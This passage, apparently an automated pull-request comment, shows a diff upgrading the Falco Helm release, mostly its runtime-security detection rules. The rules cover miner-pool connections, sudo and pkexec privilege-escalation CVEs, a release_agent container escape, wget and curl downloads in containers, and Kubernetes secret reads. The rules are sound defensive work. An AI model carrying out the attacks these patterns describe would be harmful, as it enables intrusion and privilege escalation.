-      condition: (evt.type in (sendto, sendmsg) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
+      condition: (evt.type in (sendto, sendmsg, connect) and evt.dir=< and (fd.net != "127.0.0.0/8" and not fd.snet in (rfc_1918_addresses)) and ((minerpool_http) or (minerpool_https) or (minerpool_other)))
 
     - macro: trusted_images_query_miner_domain_dns
-      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco))
-      append: false
+      condition: (container.image.repository in (docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco))
 
     # The rule is disabled by default.
     # Note: falco will send DNS request to resolve miner pool domain which may trigger alerts in your environment.
@@ -3188,13 +3668,13 @@
       desc: Miners typically connect to miner pools on common ports.
       condition: net_miner_pool and not trusted_images_query_miner_domain_dns
       enabled: false
-      output: Outbound connection to IP/Port flagged by cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
+      output: Outbound connection to IP/Port flagged by https://cryptoioc.ch (command=%proc.cmdline port=%fd.rport ip=%fd.rip container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [network, mitre_execution]
 
     - rule: Detect crypto miners using the Stratum protocol
       desc: Miners typically specify the mining pool to connect to with a URI that begins with 'stratum+tcp'
-      condition: spawned_process and proc.cmdline contains "stratum+tcp"
+      condition: spawned_process and (proc.cmdline contains "stratum+tcp" or proc.cmdline contains "stratum2+tcp" or proc.cmdline contains "stratum+ssl" or proc.cmdline contains "stratum2+ssl")
       output: Possible miner running (command=%proc.cmdline container=%container.info image=%container.image.repository)
       priority: CRITICAL
       tags: [process, mitre_execution]
@@ -3330,7 +3810,7 @@
 
     # The two Container Drift rules below will fire when a new executable is created in a container.
     # There are two ways to create executables - file is created with execution permissions or permissions change of existing file.
-    # We will use a new sysdig filter, is_open_exec, to find all files creations with execution permission, and will trace all chmods in a container.
+    # We will use a new filter, is_open_exec, to find all file creations with execution permission, and will trace all chmods in a container.
     # The use case we are targeting here is an attempt to execute code that was not shipped as part of a container (drift) -
     # an activity that might be malicious or non-compliant.
     # Two things to pay attention to:
@@ -3363,7 +3843,7 @@
     - rule: Container Drift Detected (open+create)
       desc: New executable created in a container due to open+create
       condition: >
-        evt.type in (open,openat,creat) and
+        evt.type in (open,openat,openat2,creat) and
         evt.is_open_exec=true and
         container and
         not runc_writing_exec_fifo and
@@ -3413,7 +3893,7 @@
     # A privilege escalation to root through heap-based buffer overflow
     - rule: Sudo Potential Privilege Escalation
       desc: Privilege escalation vulnerability affecting sudo (<= 1.9.5p2). Executing sudo using sudoedit -s or sudoedit -i command with command-line argument that ends with a single backslash character from an unprivileged user it's possible to elevate the user privileges to root.
-      condition: spawned_process and user.uid != 0 and proc.name=sudoedit and (proc.args contains -s or proc.args contains -i) and (proc.args contains "\ " or proc.args endswith \)
+      condition: spawned_process and user.uid != 0 and (proc.name=sudoedit or proc.name = sudo) and (proc.args contains -s or proc.args contains -i or proc.args contains --login) and (proc.args contains "\ " or proc.args endswith \)
       output: "Detect Sudo Privilege Escalation Exploit (CVE-2021-3156) (user=%user.name parent=%proc.pname cmdline=%proc.cmdline %container.info)"
       priority: CRITICAL
       tags: [filesystem, mitre_privilege_escalation]
@@ -3431,13 +3911,17 @@
     - macro: mount_info
       condition: (proc.args="" or proc.args intersects ("-V", "-l", "-h"))
 
+    - macro: user_known_mount_in_privileged_containers
+      condition: (never_true)
+
     - rule: Mount Launched in Privileged Container
-      desc: Detect file system mount happened inside a privilegd container which might lead to container escape.
+      desc: Detect file system mount happened inside a privileged container which might lead to container escape.
       condition: >
         spawned_process and container
         and container.privileged=true
         and proc.name=mount
         and not mount_info
+        and not user_known_mount_in_privileged_containers
       output: Mount was executed inside a privileged container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline %container.info image=%container.image.repository:%container.image.tag)
       priority: WARNING
       tags: [container, cis, mitre_lateral_movement]
@@ -3460,12 +3944,64 @@
       priority: CRITICAL
       tags: [syscall, mitre_defense_evasion]
 
+    - list: ingress_remote_file_copy_binaries
+      items: [wget]
+
+    - macro: ingress_remote_file_copy_procs
+      condition: (proc.name in (ingress_remote_file_copy_binaries))
+
+    # Users should overwrite this macro to specify custom conditions under which
+    # the use of an ingress remote file copy tool in a container is expected.
+    - macro: user_known_ingress_remote_file_copy_activities
+      condition: (never_true)
+
+    - macro: curl_download
+      condition: proc.name = curl and
+                 (proc.cmdline contains " -o " or
+                 proc.cmdline contains " --output " or
+                 proc.cmdline contains " -O " or
+                 proc.cmdline contains " --remote-name ")
+
+    - rule: Launch Ingress Remote File Copy Tools in Container
+      desc: Detect ingress remote file copy tools launched in container
+      condition: >
+        spawned_process and
+        container and
+        (ingress_remote_file_copy_procs or curl_download) and
+        not user_known_ingress_remote_file_copy_activities
+      output: >
+        Ingress remote file copy tool launched in container (user=%user.name user_loginuid=%user.loginuid command=%proc.cmdline parent_process=%proc.pname
+        container_id=%container.id container_name=%container.name image=%container.image.repository:%container.image.tag)
+      priority: NOTICE
+      tags: [network, process, mitre_command_and_control]
+
+    # This rule helps detect CVE-2021-4034:
+    # A privilege escalation to root through memory corruption
+    - rule: Polkit Local Privilege Escalation Vulnerability (CVE-2021-4034)
+      desc: "This rule detects an attempt to exploit a privilege escalation vulnerability in Polkit's pkexec. By running specially crafted code, a local user can leverage this flaw to gain root privileges on a compromised system"
+      condition:
+        spawned_process and user.uid != 0 and proc.name=pkexec and proc.args = ''
+      output:
+        "Detect Polkit pkexec Local Privilege Escalation Exploit (CVE-2021-4034) (user=%user.loginname uid=%user.loginuid command=%proc.cmdline args=%proc.args)"
+      priority: CRITICAL
+      tags: [process, mitre_privilege_escalation]
+
+
+    - rule: Detect release_agent File Container Escapes
+      desc: "This rule detects an attempt to exploit a container escape using the release_agent file. By running a container with certain capabilities, a privileged user can modify the release_agent file and escape from the container"
+      condition:
+        open_write and container and fd.name endswith release_agent and (user.uid=0 or thread.cap_effective contains CAP_DAC_OVERRIDE) and thread.cap_effective contains CAP_SYS_ADMIN
+      output:
+        "Detect an attempt to exploit a container escape using release_agent file (user=%user.name user_loginuid=%user.loginuid filename=%fd.name %container.info image=%container.image.repository:%container.image.tag cap_effective=%thread.cap_effective)"
+      priority: CRITICAL
+      tags: [container, mitre_privilege_escalation, mitre_lateral_movement]
+
     # Application rules have moved to application_rules.yaml. Please look
     # there if you want to enable them by adding to
     # falco_rules.local.yaml.
   k8s_audit_rules.yaml: |
     #
-    # Copyright (C) 2019 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -3480,7 +4016,14 @@
     # See the License for the specific language governing permissions and
     # limitations under the License.
     #
-    - required_engine_version: 2
+
+    - required_engine_version: 12
+
+    - required_plugin_versions:
+      - name: k8saudit
+        version: 0.1.0
+      - name: json
+        version: 0.3.0
 
     # Like always_true/always_false, but works with k8s audit events
     - macro: k8s_audit_always_true
@@ -3517,13 +4060,24 @@
         cluster-autoscaler,
         "system:addon-manager",
         "cloud-controller-manager",
-        "eks:node-manager",
         "system:kube-controller-manager"
         ]
 
+    - list: eks_allowed_k8s_users
+      items: [
+        "eks:node-manager",
+        "eks:certificate-controller",
+        "eks:fargate-scheduler",
+        "eks:k8s-metrics",
+        "eks:authenticator",
+        "eks:cluster-event-watcher",
+        "eks:nodewatcher",
+        "eks:pod-identity-mutating-webhook"
+        ]
     - rule: Disallowed K8s User
       desc: Detect any k8s operation by users outside of an allowed set of users.
-      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users)
+      condition: kevt and non_system_user and not ka.user.name in (allowed_k8s_users) and not ka.user.name in (eks_allowed_k8s_users)
       output: K8s Operation performed by user not in allowed list of users (user=%ka.user.name target=%ka.target.name/%ka.target.resource verb=%ka.verb uri=%ka.uri resp=%ka.response.code)
       priority: WARNING
       source: k8s_audit
@@ -3541,6 +4095,9 @@
     - macro: response_successful
       condition: (ka.response.code startswith 2)
 
+    - macro: kget
+      condition: ka.verb=get
+
     - macro: kcreate
       condition: ka.verb=create
 
@@ -3586,6 +4143,12 @@
     - macro: health_endpoint
       condition: ka.uri=/healthz
 
+    - macro: live_endpoint
+      condition: ka.uri=/livez
+
+    - macro: ready_endpoint
+      condition: ka.uri=/readyz
+
     - rule: Create Disallowed Pod
       desc: >
         Detect an attempt to start a pod with a container image outside of a list of allowed images.
@@ -3618,6 +4181,19 @@
       source: k8s_audit
       tags: [k8s]
 
+    # These container images are allowed to run with hostnetwork=true
+    - list: falco_hostnetwork_images
+      items: [
+        gcr.io/google-containers/prometheus-to-sd,
+        gcr.io/projectcalico-org/typha,
+        gcr.io/projectcalico-org/node,
+        gke.gcr.io/gke-metadata-server,
+        gke.gcr.io/kube-proxy,
+        gke.gcr.io/netd-amd64,
+        k8s.gcr.io/ip-masq-agent-amd64,
+        k8s.gcr.io/prometheus-to-sd,
+        ]
+
     # Corresponds to K8s CIS Benchmark 1.7.4
     - rule: Create HostNetwork Pod
       desc: Detect an attempt to start a pod using the host network.
@@ -3627,6 +4203,28 @@
       source: k8s_audit
       tags: [k8s]
 
+    - list: falco_hostpid_images
+      items: []
+
+    - rule: Create HostPid Pod
+      desc: Detect an attempt to start a pod using the host pid namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_pid intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostpid_images)
+      output: Pod started using host pid namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
+    - list: falco_hostipc_images
+      items: []
+
+    - rule: Create HostIPC Pod
+      desc: Detect an attempt to start a pod using the host ipc namespace.
+      condition: kevt and pod and kcreate and ka.req.pod.host_ipc intersects (true) and not ka.req.pod.containers.image.repository in (falco_hostipc_images)
+      output: Pod started using host ipc namespace (user=%ka.user.name pod=%ka.resp.name ns=%ka.target.namespace images=%ka.req.pod.containers.image)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
     - macro: user_known_node_port_service
       condition: (k8s_audit_never_true)
 
@@ -3661,7 +4259,7 @@
     - rule: Anonymous Request Allowed
       desc: >
         Detect any request made by the anonymous user that was allowed
-      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint
+      condition: kevt and ka.user.name=system:anonymous and ka.auth.decision="allow" and not health_endpoint and not live_endpoint and not ready_endpoint
       output: Request by anonymous user allowed (user=%ka.user.name verb=%ka.verb uri=%ka.uri reason=%ka.auth.reason))
       priority: WARNING
       source: k8s_audit
@@ -3741,6 +4339,7 @@
         k8s.gcr.io/kube-apiserver,
         gke.gcr.io/kube-proxy,
         gke.gcr.io/netd-amd64,
+        gke.gcr.io/watcher-daemonset,
         k8s.gcr.io/addon-resizer
         k8s.gcr.io/prometheus-to-sd,
         k8s.gcr.io/k8s-dns-dnsmasq-nanny-amd64,
@@ -3768,9 +4367,31 @@
       items: []
 
     - list: known_sa_list
-      items: ["pod-garbage-collector","resourcequota-controller","cronjob-controller","generic-garbage-collector",
-              "daemon-set-controller","endpointslice-controller","deployment-controller", "replicaset-controller",
-              "endpoint-controller", "namespace-controller", "statefulset-controller", "disruption-controller"]
+      items: [
+        coredns,
+        coredns-autoscaler,
+        cronjob-controller,
+        daemon-set-controller,
+        deployment-controller,
+        disruption-controller,
+        endpoint-controller,
+        endpointslice-controller,
+        endpointslicemirroring-controller,
+        generic-garbage-collector,
+        horizontal-pod-autoscaler,
+        job-controller,
+        namespace-controller,
+        node-controller,
+        persistent-volume-binder,
+        pod-garbage-collector,
+        pv-protection-controller,
+        pvc-protection-controller,
+        replicaset-controller,
+        resourcequota-controller,
+        root-ca-cert-publisher,
+        service-account-controller,
+        statefulset-controller
+        ]
 
     - macro: trusted_sa
       condition: (ka.target.name in (known_sa_list, user_known_sa_list))
@@ -3797,7 +4418,7 @@
       tags: [k8s]
 
     # Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
-    # (exapand this to any built-in cluster role that does "sensitive" things)
+    # (expand this to any built-in cluster role that does "sensitive" things)
     - rule: Attach to cluster-admin Role
       desc: Detect any attempt to create a ClusterRoleBinding to the cluster-admin user
       condition: kevt and clusterrolebinding and kcreate and ka.req.binding.role=cluster-admin
@@ -3910,7 +4531,7 @@
     - rule: K8s Serviceaccount Created
       desc: Detect any attempt to create a service account
       condition: (kactivity and kcreate and serviceaccount and response_successful)
-      output: K8s Serviceaccount Created (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Created (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3918,7 +4539,7 @@
     - rule: K8s Serviceaccount Deleted
       desc: Detect any attempt to delete a service account
       condition: (kactivity and kdelete and serviceaccount and response_successful)
-      output: K8s Serviceaccount Deleted (user=%ka.user.name user=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      output: K8s Serviceaccount Deleted (user=%ka.user.name serviceaccount=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
@@ -3964,13 +4585,37 @@
       tags: [k8s]
 
     - rule: K8s Secret Deleted
-      desc: Detect any attempt to delete a secret Service account tokens are excluded.
+      desc: Detect any attempt to delete a secret. Service account tokens are excluded.
       condition: (kactivity and kdelete and secret and ka.target.namespace!=kube-system and non_system_user and response_successful)
       output: K8s Secret Deleted (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
       priority: INFO
       source: k8s_audit
       tags: [k8s]
 
+    - rule: K8s Secret Get Successfully
+      desc: >
+        Detect any attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and response_successful
+      output: K8s Secret Get Successfully (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: ERROR
+      source: k8s_audit
+      tags: [k8s]
+
+    - rule: K8s Secret Get Unsuccessfully Tried
+      desc: >
+        Detect an unsuccessful attempt to get a secret. Service account tokens are excluded.
+      condition: >
+        secret and kget
+        and kactivity
+        and not response_successful
+      output: K8s Secret Get Unsuccessfully Tried (user=%ka.user.name secret=%ka.target.name ns=%ka.target.namespace resp=%ka.response.code decision=%ka.auth.decision reason=%ka.auth.reason)
+      priority: WARNING
+      source: k8s_audit
+      tags: [k8s]
+
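The two new secret-access rules above compose the same macros (`secret`, `kget`/`kdelete`, `kactivity`, `response_successful`) with different response checks. As a rough illustration of what the successful-get condition matches, here is a toy re-implementation evaluated against a fabricated audit event; the field names approximate what those macros inspect and this is a sketch, not Falco's actual rule engine:

```python
# Toy version of the condition behind "K8s Secret Get Successfully".
# Field names approximate what the secret/kget/kactivity/response_successful
# macros look at in a Kubernetes audit event; the event below is fabricated.
def secret_get_successful(event):
    return (
        event["objectRef"]["resource"] == "secrets"   # secret macro
        and event["verb"] == "get"                    # kget macro
        and event["stage"] == "ResponseComplete"      # kactivity macro
        and event["responseStatus"]["code"] < 400     # response_successful
    )

event = {
    "verb": "get",
    "stage": "ResponseComplete",
    "objectRef": {"resource": "secrets", "name": "db-creds", "namespace": "prod"},
    "responseStatus": {"code": 200},
}
print(secret_get_successful(event))  # True
```

Flipping the response code to 403 makes the same event match the unsuccessful-get rule's `not response_successful` branch instead.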
     # This rule generally matches all events, and as a result is disabled
     # by default. If you wish to enable these events, modify the
     # following macro.
@@ -4003,7 +4648,7 @@
    # cluster creation. This may signify a permission setting that is too broad.
    # As we can't check the role of the user on a general ka.* event, this
    # may or may not be an administrator. Customize the full_admin_k8s_users
-    # list to your needs, and activate at your discrection.
+    # list to your needs, and activate at your discretion.
 
     # # How to test:
     # # Execute any kubectl command connected using default cluster user, as:
@@ -4184,8 +4829,8 @@
         app: falco
         role: security
       annotations:
-        checksum/config: 9ac2b16de3ea0caa56e07879f0d383db5a400f1e84c2e04d5f2cec53f8b23a4a
-        checksum/rules: 4fead7ed0d40bd6533c61315bc4089d124976d46b052192f768b9c97be5d405e
+        checksum/config: 16c079f4d9236d61d88e62cb8375e3829b843af1d1b7a759fcb5926c811d7a0c
+        checksum/rules: 7cd22ed0976fb212ad4582922d7a021ef74c11c431d2bcd6212ebfded09f9492
         checksum/certs: 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
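The updated `checksum/config` and `checksum/rules` annotations are the usual Helm pattern: the chart hashes its rendered ConfigMaps into the pod template so that any config change rolls the DaemonSet. Notably, `checksum/certs` is unchanged across this diff because it is the SHA-256 of a single newline, i.e. the certs template renders empty here:

```python
import hashlib

# The checksum annotations hash the rendered config into the pod template,
# forcing a rollout whenever the config changes. checksum/certs above is
# the digest of nothing but a trailing newline (no certs configured):
digest = hashlib.sha256(b"\n").hexdigest()
print(digest)
# 01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b
```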
     spec:
       serviceAccountName: falco
@@ -4196,7 +4841,7 @@
           operator: Exists
       containers:
         - name: falco
-          image: public.ecr.aws/falcosecurity/falco:0.30.0
+          image: public.ecr.aws/falcosecurity/falco:0.32.0
           imagePullPolicy: IfNotPresent
           resources:
             limits:
@@ -4211,11 +4856,14 @@
             - /usr/bin/falco
             - --cri
             - /run/containerd/containerd.sock
+            - --cri
+            - /run/crio/crio.sock
             - -K
             - /var/run/secrets/kubernetes.io/serviceaccount/token
             - -k
             - https://$(KUBERNETES_SERVICE_HOST)
-            - --k8s-node="${FALCO_K8S_NODE_NAME}"
+            - --k8s-node
+            - "$(FALCO_K8S_NODE_NAME)"
             - -pk
           env:
             - name: FALCO_K8S_NODE_NAME
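The `--k8s-node` change in this hunk matters because container args are not run through a shell: the kubelet only expands `$(VAR)` references from the pod's env, so the old `"${FALCO_K8S_NODE_NAME}"` form reached Falco as a literal string. A minimal sketch of that expansion rule (the regex and helper are illustrative, not kubelet code):

```python
import re

def expand_args(args, env):
    # Kubernetes substitutes $(VAR) in container command/args from the pod
    # env; shell syntax like ${VAR} is left untouched (no shell is involved).
    return [
        re.sub(r"\$\((\w+)\)", lambda m: env.get(m.group(1), m.group(0)), a)
        for a in args
    ]

env = {"FALCO_K8S_NODE_NAME": "worker-1"}
print(expand_args(['--k8s-node="${FALCO_K8S_NODE_NAME}"'], env))
# ['--k8s-node="${FALCO_K8S_NODE_NAME}"']  (old form: passed through literally)
print(expand_args(["--k8s-node", "$(FALCO_K8S_NODE_NAME)"], env))
# ['--k8s-node', 'worker-1']  (new form: expanded by the kubelet)
```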
@@ -4243,6 +4891,8 @@
           volumeMounts:
             - mountPath: /host/run/containerd/containerd.sock
               name: containerd-socket
+            - mountPath: /host/run/crio/crio.sock
+              name: crio-socket
             - mountPath: /host/dev
               name: dev-fs
               readOnly: true
@@ -4270,6 +4920,9 @@
         - name: containerd-socket
           hostPath:
             path: /var/run/k3s/containerd/containerd.sock
+        - name: crio-socket
+          hostPath:
+            path: /run/crio/crio.sock
         - name: dev-fs
           hostPath:
             path: /dev
@@ -4300,6 +4953,10 @@
                 path: falco_rules.local.yaml
               - key: application_rules.yaml
                 path: rules.available/application_rules.yaml
+              - key: k8s_audit_rules.yaml
+                path: k8s_audit_rules.yaml
+              - key: aws_cloudtrail_rules.yaml
+                path: aws_cloudtrail_rules.yaml
         - name: rules-volume
           configMap:
             name: falco-rules

@renovate renovate bot changed the title chore(deps): update helm release falco to v1.19.1 chore(deps): update helm release falco to v1.19.2 Jun 13, 2022
@github-actions

Path: cluster/apps/security/falco-system/falco/helm-release.yaml
Version: 1.16.0 -> 1.19.2

@@ -153,7 +153,7 @@
     release: "falco"
     heritage: "Helm"
 data:
-  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. 
This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - \"ignore\": do nothing. If an empty list is provided, ignore is assumed.\n#   - \"log\": log a CRITICAL message noting that the buffer was full.\n#   - \"alert\": emit a falco alert noting that the buffer was full.\n#   - \"exit\": exit falco with a non-zero rc.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of 10 messages.\nsyscall_event_drops:\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 10\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\n\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\n\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\n\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\n\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# Possible additional things you might want to do with program output:\n#   - send to a slack webhook:\n#         program: \"\\\"jq '{text: .output}' | curl -d @- -X POST https://hooks.slack.com/services/XXX\\\"\"\n#   - logging (alternate method than syslog):\n#         program: logger -t falco-test\n#   - send over a network connection:\n#         program: nc host.example.com 80\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: http://falco-sidekick-falcosidekick:2801\n\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libk8saudit.so\n      name: k8saudit\n      open_params: http://:9765/k8s-audit\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n# Watch config file and rules files for modification.\n# When a file is modified, Falco will propagate new config,\n# by reloading itself.\nwatch_config_files: true\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. 
\"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. 
When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously 